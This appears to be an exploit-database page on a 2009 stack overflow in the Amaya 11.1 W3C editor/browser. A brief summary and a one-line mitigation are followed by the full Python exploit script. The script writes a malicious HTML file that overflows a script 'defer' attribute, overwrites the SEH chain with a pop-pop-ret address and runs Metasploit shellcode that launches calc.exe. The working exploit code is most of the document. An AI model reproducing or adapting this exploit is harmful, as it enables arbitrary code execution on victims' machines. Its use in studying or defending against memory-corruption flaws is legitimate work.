Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit

vendor:

Amaya

by:

Encrypt3d.M!nd

9.3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Amaya

Affected Version From: 11.1

Affected Version To: 11.1

Patch Exists: YES

Related CWE: N/A

CPE: a:w3c:amaya:11.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit

Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit is a vulnerability that allows an attacker to execute arbitrary code on the vulnerable system by overflowing the stack with malicious code. This exploit is based on Rob Carter's Exploit and works with Windows XP SP2. The exploit requires the attacker to upload Devil_inside.html to a remote host.

Mitigation:

Apply the latest security patches and updates to the system to ensure that the system is up to date.

Source

Exploit-DB raw data:

# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Origninal Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note:you need to upload Devil_inside.html to a remote host
# Works with windows xp sp2
#


# metasploit - run calc.exe

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
"\x58\x30\x41\x30\x50\x41\x6b\x41\x41\x73\x32\x41\x42\x41\x32\x42"
"\x42\x30\x42\x42\x58\x42\x50\x38\x41\x42\x75\x4d\x39\x59\x6c\x4d"
"\x38\x42\x64\x33\x30\x37\x70\x47\x70\x4e\x6b\x52\x65\x65\x6c\x6e"
"\x6b\x41\x6c\x74\x45\x70\x78\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x74"
"\x58\x4c\x4b\x53\x6f\x55\x70\x46\x61\x4a\x4b\x72\x69\x6e\x6b\x35"
"\x64\x4c\x4b\x35\x51\x48\x6e\x66\x51\x4b\x70\x4a\x39\x6e\x4c\x4e"
"\x64\x4b\x70\x43\x44\x66\x67\x4b\x71\x4b\x7a\x44\x4d\x55\x51\x58"
"\x42\x58\x6b\x6c\x34\x77\x4b\x30\x54\x35\x74\x37\x74\x54\x35\x68"
"\x65\x4e\x6b\x31\x4f\x54\x64\x47\x71\x6a\x4b\x55\x36\x4e\x6b\x76"
"\x6c\x30\x4b\x4e\x6b\x51\x4f\x55\x4c\x35\x51\x7a\x4b\x4e\x6b\x45"
"\x4c\x4c\x4b\x46\x61\x48\x6b\x4f\x79\x53\x6c\x36\x44\x54\x44\x79"
"\x53\x30\x31\x6f\x30\x50\x64\x4c\x4b\x33\x70\x46\x50\x4f\x75\x6f"
"\x30\x70\x78\x34\x4c\x4e\x6b\x57\x30\x66\x6c\x4e\x6b\x50\x70\x35"
"\x4c\x4e\x4d\x6e\x6b\x52\x48\x53\x38\x4a\x4b\x53\x39\x4c\x4b\x4f"
"\x70\x6e\x50\x35\x50\x55\x50\x53\x30\x6e\x6b\x53\x58\x57\x4c\x53"
"\x6f\x74\x71\x7a\x56\x51\x70\x70\x56\x6f\x79\x39\x68\x4c\x43\x69"
"\x50\x43\x4b\x30\x50\x71\x78\x78\x70\x4f\x7a\x37\x74\x73\x6f\x75"
"\x38\x6c\x58\x6b\x4e\x4f\x7a\x56\x6e\x73\x67\x79\x6f\x4b\x57\x35"
"\x33\x35\x31\x32\x4c\x45\x33\x47\x70\x63")


chars = "\x41" * 6887
chars+= "\x74\x06\x41\x41"	        # jmp short 06
chars+= "\x17\x19\x10\x02"	        # 0x02101917 - pop pop ret in amaya module
chars+= "\x68\x7f\x01\x01\x7f"		# push 7f01017f
chars+= "\x58"				# pop eax
chars+= "\x2d\x18\x69\x45\x7d"		# sub eax,7a7a0857
chars+= "\x50"				# push eax
chars+= "\xc3"				# retn
chars+= "\x90" * 100
chars+=shellcode

header= ('<script defer="'+chars+'">')

file=open('Devil_inside.html','w')
file.write(header)
file.close()

# milw0rm.com [2009-03-30]